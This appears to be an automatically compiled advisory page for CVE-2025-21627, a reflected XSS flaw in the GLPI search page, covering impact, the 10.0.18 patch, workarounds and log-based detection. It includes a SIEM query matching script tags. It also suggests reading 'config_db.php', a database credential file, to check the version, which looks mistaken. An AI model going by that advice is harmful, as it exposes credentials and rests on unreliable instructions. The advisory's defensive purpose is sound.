CVE-2025-21627
📋 TL;DR
GLPI versions before 10.0.18 contain a reflected cross-site scripting (XSS) vulnerability on the search page. Attackers can craft malicious links to execute arbitrary JavaScript in victims' browsers. If anonymous ticket creation is enabled, unauthenticated users can exploit this vulnerability.
💻 Affected Systems
- GLPI
📦 What is this software?
Glpi by Glpi Project
⚠️ Risk & Real-World Impact
Worst Case
Attackers steal session cookies, perform actions as authenticated users, redirect to malicious sites, or install malware via browser exploitation.
Likely Case
Session hijacking leading to unauthorized access, data theft, or privilege escalation within the GLPI application.
If Mitigated
Limited impact if proper input validation and output encoding are implemented, though some user interaction may still be required.
🎯 Exploit Status
Reflected XSS typically requires user interaction (clicking a malicious link), but exploitation is straightforward once the link is crafted.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 10.0.18
Vendor Advisory: https://github.com/glpi-project/glpi/security/advisories/GHSA-qm8p-jmj2-qfc2
Restart Required: No
Instructions:
1. Backup your GLPI installation and database. 2. Download GLPI 10.0.18 or later from the official repository. 3. Follow the GLPI upgrade documentation to apply the update. 4. Verify the update was successful by checking the version.
🔧 Temporary Workarounds
Disable Anonymous Ticket Creation
allPrevents unauthenticated exploitation by disabling the anonymous ticket creation feature.
Navigate to GLPI Setup > General > Helpdesk > Disable 'Allow anonymous ticket creation'
Implement WAF Rules
allConfigure web application firewall to block XSS payloads in search parameters.
Add WAF rule to filter malicious input in search parameters (e.g., ModSecurity rule 941100-941999)
🧯 If You Can't Patch
- Disable anonymous ticket creation in GLPI configuration.
- Implement Content Security Policy (CSP) headers to restrict script execution.
🔍 How to Verify
Check if Vulnerable:
Check GLPI version via admin interface or by examining the GLPI installation files.Check Version:
Check GLPI version in the admin dashboard or via 'cat glpi/config/config_db.php' for version info.Verify Fix Applied:
Confirm version is 10.0.18 or later and test search functionality with XSS payloads.📡 Detection & Monitoring
Log Indicators:
- Unusual search queries containing JavaScript or HTML tags in GLPI logs.
- Multiple failed login attempts or session hijacking events.
Network Indicators:
- HTTP requests with suspicious parameters in search queries (e.g., containing <script> tags).
SIEM Query:
source="glpi_logs" AND (message="*<script>*" OR message="*javascript:*")